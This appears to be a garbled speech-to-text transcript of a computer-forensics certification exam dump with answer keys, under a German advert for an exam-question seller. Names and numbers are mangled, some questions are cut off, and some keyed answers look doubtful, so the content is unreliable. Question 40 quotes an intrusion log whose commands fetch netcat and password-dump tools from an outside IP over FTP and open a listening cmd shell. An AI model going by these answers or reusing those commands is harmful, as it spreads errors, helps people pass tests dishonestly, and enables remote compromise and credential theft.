Willkommen bei Exam Heist, Ihr Partner für Zertifizierungserfolg. Wir bieten umfassende Lernmaterialien, online und offline, und begleiten Sie Schritt für Schritt. Von PDF-Leitfäden bis zu praxisnahen Übungssätzen. Alle wichtigen Fragen für Ihre Zertifizierung sind abgedeckt. Sie haben jederzeit die richtigen Ressourcen griffbereit. Laden Sie PDFs herunter. Machen Sie Tests und nutzen Sie unser Expertenteam. Mit interaktiver Online-Praxis können Sie sich überall und jederzeit prüfen. Unsere PDFs sind prüfungsbereit, sorgfältig zusammengestellt und bleiben stets aktuell. Tausende Lernende haben sich bereits erfolgreich zertifizieren lassen und vertrauen auf unsere Qualität. Zertifizierte Fachkräfte stehen bereit, um Ihre Fragen zu beantworten. Starten Sie heute und geben Sie Ihrer Vorbereitung den entscheidenden Vorteil mit Exam Heist. Besuchen Sie examheist.com. Exam Heist. Ihr Weg zum Erfolg beginnt hier.
Question 1. When an investigator contacts by telephone the domain administrator or controller listed by a who is lookup to request all emails sent and received for a user account be preserved with U.S. C. Statute authorizes this phone call and obligates the ISP to preserve email records. Option A. Title 18. Section 1030. Option B. Title 18. Section 2703. D. Option C. Title 18. Section Chapter 90. Option D. Title 18. Section 2703. F. Choose the correct answer. Correct answer is Option D. Title 18, Section 2703, F. Question 2. Item 2. If you come across a sheep deep machine at your client site, what would you infer? Option A. A sheep deep coordinates several honeypots. Option B. A sheep deep computer is another name for a honeypot. Option C. A sheep deep computer is used only for virus checking. Option D. A sheep deep computer defers a denial of service attack. Choose the correct answer. Correct answer is Option C. A sheep deep computer is used only for virus checking. Question 3. In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court? Option A. Rules of evidence. Option B. Law of probability. Option C. Chain of custody. Option D. Policy of separation. Choose the correct answer. Correct answer is Option C. Chain of custody. Question 4. How many characters long is the fixed-length MD5 algorithm checksum of a critical system file? Option A. 128. Option B. 64. Option C. 32. Option D. 16. Choose the correct answer. Correct answer is Option C. 32. Question 5. You are working on a thesis for your doctorate degree in computer science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal. What have you found? Option A. Web bug. Option B. CGI code. Option C. Trojan downloader. Option D. Blind bug. Choose the correct answer. Correct answer is Option A. Web bug. Question 6. You are using Drive Spy a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors? Option A. 1000, 150. Option B. 1709, 150. Option C. 1709, 150. Option D. 1709 to 1858. Choose the correct answer. Correct answer is option B. 0 is to 1709, 150. Question 7. A honeypot deployed with the IP 172. 16. 108 was compromised by an attacker. Given below is an excerpt from a SNOT binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. Note: the student is being tested on concepts learned during passive OS fingerprinting, basic TCP, IP connection concepts in the ability to read packet signatures from a sniff dump. 03, 15 to 20, 21, 24, 107 053, 211, 185, 125, 124, 3500 to 172, 16, 108, 111 TCP TTL, 43 TOS, 0x0 ID, 29726 IPLEN, 20 DGM LEN, 52 DF asterisk A asterisk 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 SUC, hexadecimal 9B6338C5 AC, 0x5820 ADD0 WIN, hexadecimal 7D78 TCP LEN, 32 TCP options, 3 equals greater than NOP NOP TS, 2367864, 2878772 equals plus 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 equals 03, 15 to 20, 21, 24, 452051, 211, 185, 125, 124, 789 to 172, 16, 103, 111 UDP TTL, 43 TOS, 0x0 ID, 29733 IPLEN, 20 DGM LEN, 84 LEN, 6401 088 A0 A00 00 00 00 00 00 02 0001 86 AO, 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 186B8 000001 11 equals plus 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 03, 15 to 20. 21, 24, 730436, 211. 185, 125, 124, 790 to 172. 16, 1, 103, 32773 UDPTTL. 43 TOS, 0x0 ID. 29781 IPLEN. 20 DGM LEN. 1104 LEN. 1084-47 F79 F63 00 00 00 00 00 00 02 0001 86B8. Option A. The attacker has conducted a network sweep on port 111. Option B. The attacker has scanned and exploited the system using buffer overflow. Option C. The attacker has used a Trojan on port 32773. Option D. The attacker has installed a backdoor. Choose the correct answer. Correct answer is Option A. The attacker has conducted a network sweep on port 111. Question 8. The newer Macintosh operating system is based on Option A. OS 2. Option B. BSD Unix. Option C. Linux. Option D. Microsoft Windows. Choose the correct answer. Correct answer is Option B. BSD Unix. Question 9. Before you are called to testify as an expert, what must an attorney do first? Option A. Engage in damage control. Option B. Prove that the tools you used to conduct your examination are perfect. Option C. Read your curriculum vitae to the jury. Option D. Qualify you as an expert witness. Choose the correct answer. Correct answer is Option D. Qualify you as an expert witness. Question 10. You are contracted to work as a computer forensics investigator for a regional bank that has 430 terabytes storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network? Option A. Create a compressed copy of the file with double space. Option B. Create a sparse data copy of a folder or file. Option C. Make a bitstream disk to image file. Option D. Make a bitstream disk to disk file. Choose the correct answer. Correct answer is Option C. Make a bitstream disk to image file. Question 11. Company. Time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating? Option A. Trademark law. Option B. Copyright law. Option C. Print right law. Option D. Brandmark law. Choose the correct answer. Correct answer is Option A. Trademark law. Question 12. What file structure database would you expect to find on floppy disks? Option A. NTFS. Option B. FAT32. Option C. FAT16. Option D. FAT12. Choose the correct answer. Correct answer is Option D. FAT12. Question 13. Disabled. Option A. Digital attack. Option B. Denial of service. Option C. Physical attack. Option D. ARP redirect. Choose the correct answer. Correct answer is Option B. Denial of service. Question 14. When examining a file with a hex editor, what space does the file header occupy? Option A. The last several bytes of the file. Option B. The first several bytes of the file. Option C. None. File headers are contained in the FAT. Option D. One byte at the beginning of the file. Choose the correct answer. Correct answer is option B, the first several bytes of the file. Question 15. In the context of file deletion process, which of the following statement holds true? Option A. When files are deleted, the data is overwritten and the cluster marked as available. Option B. The longer a disk is in use, the less likely it is that deleted files will be overwritten. Option C. While booting, the machine may create temporary files that can delete evidence. Option D. Secure delete programs work by completely overwriting the file in one go. Choose the correct answer. Correct answer is option C. While booting, the machine may create temporary files that can delete evidence. Question 16. A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Option A. Image the disk and try to recover deleted files. Option B. Seek the help of coworkers who are eyewitnesses. Option C. Check the Windows registry for connection data you may or may not recover. Option D. Approach the websites for evidence. Choose the correct answer. Correct answer is option A. Image the disk and try to recover deleted files. Question 17. A. N. is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence. Option A. Blackout attack. Option B. Automated attack. Option C. Distributed attack. Option D. Central processing attack. Choose the correct answer. Correct answer is option B. Automated attack. Question 18. The offset in a hexadecimal code is option A. The last byte after the colon. Option B. The 0x at the beginning of the code. Option C. The 0x at the end of the code. Option D. The first byte after the colon. Choose the correct answer. Correct answer is option D. The first byte after the colon. Question 19. It takes mismanaged case S to ruin your professional reputation as a computer forensics examiner. Option A. By law. 3. Option B. Quite a few. Option C. Only one. Option D. At least two. Choose the correct answer. Correct answer is option C. Only one. Question 20. With the standard Linux second extended file system, ext2fs, a file is deleted when the inode internal link count reaches option A. 0. Option B. 10. Option C. 100. Option D. 1. Choose the correct answer. Correct answer is option A. 0. Question 21. When examining the log files from a Windows ES web server, how often is a new log file created? Option A. The same log is used at all times. Option B. A new log file is created every day. Option C. A new log file is created each week. Option D. A new log is created each time the web server is started. Choose the correct answer. Correct answer is Option B. A new log file is created every day. Question 22. Which part of the Windows registry contains the user's password file? Option A. HKEY local machine. Option B. HKEY current configuration. Option C. HKEY user. Option D. HKEY current user. Choose the correct answer. Correct answer is option A. HKEY local machine. Question 23. An employee is attempting to wipe out data stored on a couple of compact discs, CDs, and digital video discs, DVDs, by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are media used to store large amounts of data and are not affected by the magnet. Option A. Logical. Option B. Anti-magnetic. Option C. Magnetic. Option D. Optical. Choose the correct answer. Correct answer is option D. Optical. Question 24. Lance wants to place a honeypot on his network. Which of the following would be your recommendations? Option A. Use a system that has a dynamic addressing on the network. Option B. Use a system that is not directly interacting with the router. Option C. Use it on a system in an external DMZ in front of the firewall. Option D. It doesn't matter as all replies are faked. Choose the correct answer. Correct answer is option D. It doesn't matter as all replies are faked. Question 25. What does the acronym POST mean as it relates to a PC? Option A. Primary Operations Short Test. Option B. Power on Self-Test. Option C. Pre-operational Situation Test. Option D. Primary Operating System Test. Choose the correct answer. Correct answer is option B. Power on Self-Test. Question 26. Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime? Option A. Bench warrant. Option B. Wiretap. Option C. Subpoena. Option D. Search warrant. Choose the correct answer. Correct answer is option D. Search warrant. Question 27. You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case? Option A. All forms should be placed in an approved secure container because they are now primary evidence in the case. Option B. The multi-evidence form should be placed in the report file and the single evidence forms should be kept with each hard drive in an approved secure container. Option C. The multi-evidence form should be placed in an approved secure container with the hard drives and the single evidence forms should be placed in the report file. Option D. All forms should be placed in the report file because they are now primary evidence in the case. Choose the correct answer. Correct answer is option B. The multi-evidence form should be placed in the report file and the single evidence forms should be kept with each hard drive in an approved secure container. Question 28. The MD5 program is used to. Option A. Wipe magnetic media before recycling it. Option B. Make directories on an evidence disk. Option C. View graphics files on an evidence drive. Option D. Verify that a disk is not altered when you examine it. Choose the correct answer. Correct answer is Option D. Verify that a disk is not altered when you examine it. Question 29. Which is a standard procedure to perform during all computer forensics investigations? Option A. With the hard drive removed from the suspect PC. Check the date and time in the system's CMOS. Option B. With the hard drive in the suspect PC. Check the date and time in the file allocation table. Option C. With the hard drive removed from the suspect PC. Check the date and time in the system's RAM. Option D. With the hard drive in the suspect PC. Check the date and time in the system's CMOS. Choose the correct answer. Correct answer is Option A. With the hard drive removed from the suspect PC. Check the date and time in the system's CMOS. Question 30. Email logs contain which of the following information to help you in your investigation? Choose 4. Option A. User account that was used to send the account. Option B. Attachment sent with the email message. Option C. Unique message identifier. Option D. Contents of the email message. Option E. Date and time the message was sent. Choose the correct answer. Correct answer is Option A. User account that was used to send the account. Option C. Unique message identifier. Option E. Date and time the message was sent. Question 31. In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze? Option A. One who has NTFS 4 or 5 partitions. Option B. One who uses dynamic swap file capability. Option C. One who uses hard disk writes on IRQ13 and 21. Option D. One who has lots of allocation units per block or cluster. Choose the correct answer. Correct answer is Option D. One who has lots of allocation units per block or cluster. Question 32. In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case? Option A. Evidence must be handled in the same way regardless of the type of case. Option B. Evidence procedures are not important unless you work for a law enforcement agency. Option C. Evidence in a criminal case must be secured more tightly than in a civil case. Option D. Evidence in a civil case must be secured more tightly than in a criminal case. Choose the correct answer. Correct answer is Option C. Evidence in a criminal case must be secured more tightly than in a civil case. Question 33. You are assigned to work in the computer forensics lab of a state police agency. While working on a high-profile criminal case, you have followed every applicable procedure. However, your boss is still concerned that the defense attorney might question whether evidence has been changed while at a lab. What can you do to prove that the evidence is the same as it was when it first entered the lab? Option A. Make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered a lab. Option B. Make an MD5 hash of the evidence and compare it to the standard database developed by NIST. Option C. There is no reason to worry about this possible claim because state labs are certified. Option D. Sign a statement attesting that the evidence is the same as it was when it entered the lab. Choose the correct answer. Correct answer is Option A. Make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered K. Lab. Question 34. Study the log given below and answer the following question. April 24, 14. 46. 46. 4663. SPP POTScan. POTScan detected from 194. 222. 156. 169 April 24, 14. 46. 46. 4663. IDs 27. FeanScan. 194. 222. 156. 169. 56693 to 172. 16. 1. 107. 482 April 24, 18. 01. 05. 4663. IDs, DNS version query. 212. 244. 97. 121. 3485 to 172. 16. 1. 107. 53 April 24, 19. 04. 01. 4663. IDs 213. FTP password retrieval. 194. 222. 156. 169. 1425 to 172. 16. 1. 107. 21 April 25, 08. 02. 41. 5875. SPP POTScan. PORTSCAN detected from 24. 9. 255. 53 April 25, 02. 08. 07. 5875. IDs 277. DNS version query. 63. 226. 81. 13. 4499 to 172. 16. 1. 107. 53 April 25, 02. 08. 07. 5875. IDs 277. DNS version query. 63. 226. 81. 13. 4630 to 172. 16. 1. 101. 53 April 25, 02. 38. 17. 5875. IDs, RPC info query. 212. 251. 1. 94. 642 to 172. 16. 1. 107. 111 April 25, 19. 37. 32. 5875. IDs 230. Web CGI space wildcard. 198. 173. 35. 164. 4221 to 172. 16. 1. 107. 80 April 26, 05. 45. 12. 6283. IDs 212. DNS zone transfer. 38. 31. 107. 87. 2291 to 172. 16. 1. 101. 53 April 26, 06. 43. 05. 6283. IDs 181. NOPS X86. 63. 226. 81. 13. 1351 to 172. 16. 1. 107. 53 April 26, 06. 44. 25 Victim 7 Pump PWDB. 12509. Login. Session opened for user simple by UID equals 0. April 26, 06. 44. 36 Victim 7 Pump PWDB. 12521. Sue. Session opened for user Simon by simple. UID equals 506. April 26, 06. 45, 34, 6283. IDs 175, SOX probe. 24, 112, 167, 35, 22 172. 16, 1, 107. 1080 April 26, 06. 52, 10, 6283. IDs 127, Telnet login incorrect. 172, 16, 1, 107, 23 to 213. 28, 22, 189. 4,558 precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate? Option A. Disallow UDP 53 in from outside to DNS server. Option B. Allow UDP 53 in from DNS server to outside. Option C. Disallow TCP 53 in from secondaries or ISP server to DNS server. Option D. Block all UDP traffic. Choose the correct answer. Correct answer is Option A. Disallow UDP 53 in from outside to DNS server. Question 35. When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place and how events interlace. What is the name of the service used to synchronize time among multiple computers? Option A. Universal Time Set. Option B. Network Time Protocol. Option C. Sync Time Service. Option D. Time Sync Protocol. Choose the correct answer. Correct answer is Option B. Network Time Protocol. Question 36. When investigating a potential email crime, what is your first step in the investigation? Option A. Trace the IP address to its origin. Option B. Write a report. Option C. Determine whether a crime was actually committed. Option D. Recover the evidence. Choose the correct answer. Correct answer is Option D. Recover the evidence. Question 37. If a suspect computer is located in an area that may have toxic chemicals, you must. Option A. Coordinate with the hazmat team. Option B. Determine a way to obtain the suspect computer. Option C. Assume the suspect machine is contaminated. Option D. Do not enter alone. Choose the correct answer. Correct answer is Option A. Coordinate with the hazmat team. Question 38. The following excerpt is taken from a honeypot log. The log captures activities across 3 days. There are several intrusion attempts. However, a few are successful. Note: the objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack. April 24, 14. 46. 46. 4663. SPP POTSCAN. POTSCAN detected from 194. 222. 156. 169 April 24, 14. 46. 46. 4663. IDs 27. FeanScan. 194. 222. 156. 169. 56693 to 172. 16. 1. 107. 482 April 24, 18. 01. 05. 4663. IDs, DNS version query. 212, 244, 97, 121, 3485 to 172. 16, 1, 107, 53 April 24, 19. 04, 01, 4663. IDs 213, FTP password retrieval. 194, 222, 156, 169, 1425 to 172. 16, 1, 107, 21 April 25, 08. 02, 41, 5875. SPP POTSCAN. PORTSCAN detected from 24. 9, 255. 53 April 25, 02. 08, 07, 5875. IDs 277, DNS version query. 63, 226, 81, 13, 4499 to 172. 16, 1, 107, 53 April 25, 02. 08, 07, 5875. IDs 277, DNS version query. 63, 226, 81, 13, 4630 to 172. 16, 1, 101, 53 April 25, 02. 38, 17, 5875. IDs, RPC info query. 212, 251, 1, 94, 642 to 172. 16, 1, 107, 111 April 25, 19. 37, 32, 5875. IDs 230, Web CGI space wildcard. 198, 173, 35, 164, 4221 to 172. 16, 1, 107, 80 April 26, 05. 45, 12, 6283. IDs 212, DNS zone transfer. 38, 31, 107, 87, 2291 to 172. 16, 1, 101, 53 April 26, 06. 43, 05, 6283. IDs 181, NOPS X86. 63, 226, 81, 13, 1351 to 172. 16, 1, 107, 53 April 26, 06. 44, 25 Victim 7 Pump PWDB. 12509. Login. Session opened for user simple by UID equals 0. April 26, 06. 44, 36 Victim 7 Pump PWDB. 12521. Sue. Session opened for user Simon by simple. UID equals 506. April 26, 06. 45, 34, 6283. IDs 175, SOX probe. 24, 112, 167, 35, 22 172. 16, 1, 107, 1080 April 26, 06. 52, 10, 6283. IDs 127, Telnet login incorrect. 172, 16, 1, 107, 23 to 213. 28, 22, 189, 4558. From the options given below, choose the one which best interprets the following entry. April 26, 06. 43, 05 6283. IDs 181, NOPS X86. 63 226. 81 13 1351 to 172. 16 1 107. 53. Option A. An IDs evasion technique. Option B. A buffer overflow attempt. Option C. A DNS zone transfer. Option D. Data being retrieved from 63 226. 81 13. Choose the correct answer. Correct answer is Option A, an IDs evasion technique. Question 39. What happens when a file is deleted by a Microsoft operating system using the FAT file system? Option A. Only the reference to the file is removed from the FAT. Option B. The file is erased and cannot be recovered. Option C. A copy of the file is stored and the original file is erased. Option D. The file is erased but can be recovered. Choose the correct answer. Correct answer is Option A, only the reference to the file is removed from the FAT. Question 40. The following excerpt is taken from a honeypot log that was hosted at lab. Wiretrip.net. SNOT reported Unicode attacks from 213. 116. 251. 162. The file permission canonicalization vulnerability. Unicode attack. Allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot. In E, he then switches to playing with RDS. Wire MSADCS. DLL. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands, such as cmd. X. On the E server, he does a quick query to discover that the directory exists, and a query to MSADCS. DLL shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. cmd1. X. C open 213. 116. 251. 162 greater than FTP-COM, cmd1. X. C echo Jonna 2K greater than FTP-COM, cmd1. X. C echo haxt 00 greater than FTP-COM, cmd1. X. C echo get NC. X greater than FTP-COM, cmd1. X. C echo get P dump. X greater than FTP-COM, cmd1. X. C echo get SAM dump. DLL greater than FTP-COM, cmd1. X. C echo quit greater than FTP-COM, cmd1. X. C FTPS. FTP-COM, cmd1. X. CNCLP 6969 ECMD1. X. What can you infer from the exploit given? Option A. It is a local exploit where the attacker logs in using username Jonna2K. Option B. There are two attackers on the system, Jonna2K and haxt00. Option C. The attack is a remote exploit and the hacker downloads 3 files. Option D. The attacker is unsuccessful in spawning a shell as he has specified a high-end UDP port. Choose the correct answer. Correct answer is Option C. The attack is a remote exploit and the hacker downloads 3 files.